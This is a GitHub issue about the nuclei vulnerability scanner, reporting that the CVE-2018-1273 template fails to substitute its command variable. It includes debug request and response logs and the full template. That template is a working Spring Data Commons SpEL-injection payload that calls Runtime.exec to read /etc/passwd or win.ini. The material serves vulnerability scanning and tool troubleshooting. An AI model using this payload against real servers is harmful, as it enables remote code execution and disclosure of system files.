### ISSUE TITLE
Poc Payload of CVE-2018-1273 Not replaced correctly

### ISSUE THREAD

**Issue by rexSurprise** [projectdiscovery/nuclei#2599]
- env `Window10`
- command `nuclei.exe -nc -u http://192.168.18.78:8080/account -t C:\Users\Administrator\nuclei-templates\cves\2018\CVE-2018-1273.yaml -proxy http://127.0.0.1:8080 -debug`
- output 
```bash
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.7

                projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.7 (latest)
[INF] Using Nuclei Templates 9.1.9 (latest)
[INF] Templates added in last update: 35
[INF] Templates loaded for scan: 1
[DBG] Protocol request variables:
        1. RDN => 18.78
        2. TLD => 78
        3. Hostname => 192.168.18.78:8080
        4. Port => 8080
        5. BaseURL => http://192.168.18.78:8080/account
        6. FQDN => 192.168.18.78
        7. SD => 192.168
        8. Scheme => http
        9. DN => 18
        10. Host => 192.168.18.78
        11. RootURL => http://192.168.18.78:8080
        12. File => account
        13. Path => /

[INF] [CVE-2018-1273] Dumped HTTP request for http://192.168.18.78:8080/account

POST /account HTTP/1.1
Host: 192.168.18.78:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Length: 109
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei
[DBG] Protocol response variables:
        1. File => account
        2. RDN => 18.78
        3. all_headers => HTTP/1.1 500   Connection .... Sep 2022 02:31:28 GMT
        4. type => http
        5. duration => 0.0969161
        6. Hostname => 192.168.18.78:8080
        7. BaseURL => http://192.168.18.78:8080/account
        8. host => http://192.168.18.78:8080/account
        9. FQDN => 192.168.18.78
        10. TLD => 78
        11. Path => /
        12. template-info => {Spring Data Commons - Re .... tical} map[] 0x136d9ac0 }
        13. body => {"timestamp":166312268804 .... y({)'","path":"/account"}
        14. curl-command => curl -X 'POST' -d 'name[# .... 2.168.18.78:8080/account'
        15. Host => 192.168.18.78
        16. Scheme => http
        17. header => HTTP/1.1 500   Connection .... Sep 2022 02:31:28 GMT
        18. content_type => application/json;charset=UTF-8
        19. response => HTTP/1.1 500   Connection .... y({)'","path":"/account"}
        20. SD => 192.168
        21. Port => 8080
        22. RootURL => http://192.168.18.78:8080
        23. DN => 18
        24. status_code => 500
        25. template-path => C:\Users\Administrator\nuclei-tem .... s\2018\CVE-2018-1273.yaml
        26. matched => http://192.168.18.78:8080/account
        27. interactsh-server =>
        28. content_length => 360
        29. command => cat /etc/passwd
        30. date => Wed, 14 Sep 2022 02:31:28 GMT
        31. request => POST /account HTTP/1.1  H .... {{command}}')}}')]=nuclei
        32. template-id => CVE-2018-1273
        33. ip =>

[DBG] [CVE-2018-1273] Dumped HTTP response http://192.168.18.78:8080/account

HTTP/1.1 500
Connection: close
Content-Length: 360
Content-Type: application/json;charset=UTF-8
Date: Wed, 14 Sep 2022 02:31:28 GMT

{"timestamp":1663122688042,"status":500,"error":"Internal Server Error","exception":"org.springframework.expression.spel.SpelParseException","message":"Expression [name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]] @84: EL1043E: Unexpected token. Expected 'rparen())' but was 'lcurly({)'","path":"/account"}
[DBG] Protocol request variables:
        1. Scheme => http
        2. BaseURL => http://192.168.18.78:8080/account
        3. TLD => 78
        4. RootURL => http://192.168.18.78:8080
        5. Path => /
        6. File => account
        7. RDN => 18.78
        8. Host => 192.168.18.78
        9. Port => 8080
        10. FQDN => 192.168.18.78
        11. Hostname => 192.168.18.78:8080
        12. SD => 192.168
        13. DN => 18

[INF] [CVE-2018-1273] Dumped HTTP request for http://192.168.18.78:8080/account

POST /account HTTP/1.1
Host: 192.168.18.78:8080
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Content-Length: 109
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei
[DBG] Protocol response variables:
        1. TLD => 78
        2. SD => 192.168
        3. Scheme => http
        4. ip =>
        5. template-info => {Spring Data Commons - Re .... tical} map[] 0x136d9ac0 }
        6. BaseURL => http://192.168.18.78:8080/account
        7. interactsh-server =>
        8. curl-command => curl -X 'POST' -d 'name[# .... 2.168.18.78:8080/account'
        9. template-path => C:\Users\Administrator\nuclei-tem .... s\2018\CVE-2018-1273.yaml
        10. RootURL => http://192.168.18.78:8080
        11. File => account
        12. Port => 8080
        13. Hostname => 192.168.18.78:8080
        14. host => http://192.168.18.78:8080/account
        15. matched => http://192.168.18.78:8080/account
        16. duration => 0.1084379
        17. command => type C:\/Windows\/win.ini
        18. Host => 192.168.18.78
        19. content_type => application/json;charset=UTF-8
        20. response => HTTP/1.1 500   Connection .... y({)'","path":"/account"}
        21. status_code => 500
        22. date => Wed, 14 Sep 2022 02:31:28 GMT
        23. request => POST /account HTTP/1.1  H .... {{command}}')}}')]=nuclei
        24. content_length => 360
        25. FQDN => 192.168.18.78
        26. body => {"timestamp":166312268814 .... y({)'","path":"/account"}
        27. all_headers => HTTP/1.1 500   Connection .... Sep 2022 02:31:28 GMT
        28. RDN => 18.78
        29. template-id => CVE-2018-1273
        30. type => http
        31. DN => 18
        32. Path => /
        33. header => HTTP/1.1 500   Connection .... Sep 2022 02:31:28 GMT

[DBG] [CVE-2018-1273] Dumped HTTP response http://192.168.18.78:8080/account

HTTP/1.1 500
Connection: close
Content-Length: 360
Content-Type: application/json;charset=UTF-8
Date: Wed, 14 Sep 2022 02:31:28 GMT

{"timestamp":1663122688147,"status":500,"error":"Internal Server Error","exception":"org.springframework.expression.spel.SpelParseException","message":"Expression [name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]] @84: EL1043E: Unexpected token. Expected 'rparen())' but was 'lcurly({)'","path":"/account"}
[INF] No results found. Better luck next time!
```
- Request package
![image](https://user-images.githubusercontent.com/64947085/190045857-4637a478-ddd7-4de0-a9d2-064a0a6c23b2.png)

- template `C:\Users\Administrator\nuclei-templates\cves\2018\CVE-2018-1273.yaml`
```yaml
id: CVE-2018-1273

info:
  name: Spring Data Commons - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
    and older unsupported versions, contain a property binder vulnerability
    caused by improper neutralization of special elements.
    An unauthenticated remote malicious user (or attacker) can supply
    specially crafted request parameters against Spring Data REST backed HTTP resources
    or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1273
    - https://pivotal.io/security/cve-2018-1273
    - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1273
    cwe-id: CWE-20
  tags: cve,cve2018,vmware,rce,spring,kev

requests:
  - raw:
      - |
        POST /account HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Content-Type: application/x-www-form-urlencoded

        name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei

    payloads:
      command:
        - "cat /etc/passwd"
        - "type C:\\/Windows\\/win.ini"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or
        part: body

# Enhanced by mp on 2022/05/12
```
Payloads ->command is not replaced with the following content，
This is my first time to use  **nuclei**, I don't know where it was not configured!
